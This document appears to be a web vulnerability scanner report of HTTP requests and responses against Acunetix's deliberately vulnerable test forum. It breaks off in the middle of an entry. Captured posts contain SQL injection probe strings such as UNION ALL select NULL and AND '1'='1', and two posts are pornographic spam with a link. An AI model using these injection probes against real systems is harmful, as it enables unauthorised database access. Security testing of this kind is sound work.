79.125.25.187</div><div class='posttext'>) UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=27 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=27 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4151 |
| Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D27" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>') UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=28 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=28 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4151 |
| Response Body - size: 4,151 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D28" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>") UNION ALL select NULL -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=29 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=29 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 4132 |
| Response Body - size: 4,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D29" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:33 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> ASC -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=3 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 336 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=3 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 4139 |
| Response Body - size: 4,139 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D3" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:28 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='1' -- </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=30 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=30 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4131 |
| Response Body - size: 4,131 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D30" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:13:43 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>sa19agqc</div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=31 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=31 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4440 |
| Response Body - size: 4,440 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Hot galleries, daily updated collections </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D31" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Hot galleries, daily updated collections </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>victoriadi1</b> on 3/13/2022 10:23:53 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Hot galleries, daily updated collections - 185.220.101.65</div><div class='posttext'>Sexy photo galleries, daily updated pics http://freeponocom.instakink.com/?kiley free guy gay porn mike mo shoes in a porn men fucking animals porn college skinny porn preview 3d porn megasite </div></td></tr> </table> <!-- tinyMCE --> <script language="javascript" type="text/javascript" src="./jscripts/tiny_mce/tiny_mce.js"></script> <script language="javascript" type="text/javascript"> // Notice: The simple theme does not use all options some of them are limited to the advanced theme tinyMCE.init({ mode : "textareas", theme : "simple" }); </script> <!-- /tinyMCE --> <form name="frmPostMessage" method="post" enctype="application/x-www-form-urlencoded"> <table align="center" width="500px" cellpadding="5" cellspacing="0" class="FramedForm"> <tr> <td>Message subject <br> <center> <input name="tfSubject" type="text" class="postit" id="tfSubject"> </center></td> </tr> <tr> <td>Message text <br> <center> <textarea name="tfText" class="postit" id="tfText"></textarea> </center></td> </tr> <tr> <td align="right"><input type="submit" value="Post it"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=32 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 337 bytes. |
GET http://testasp.vulnweb.com/showthread.asp?id=32 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:30 GMT Content-Length: 4502 |
| Response Body - size: 4,502 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D32" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/Big Ass Photos - Free Huge Butt Porn, Big Booty Pics </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>susanac1</b> on 3/13/2022 12:03:13 PM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>Big Ass Photos - 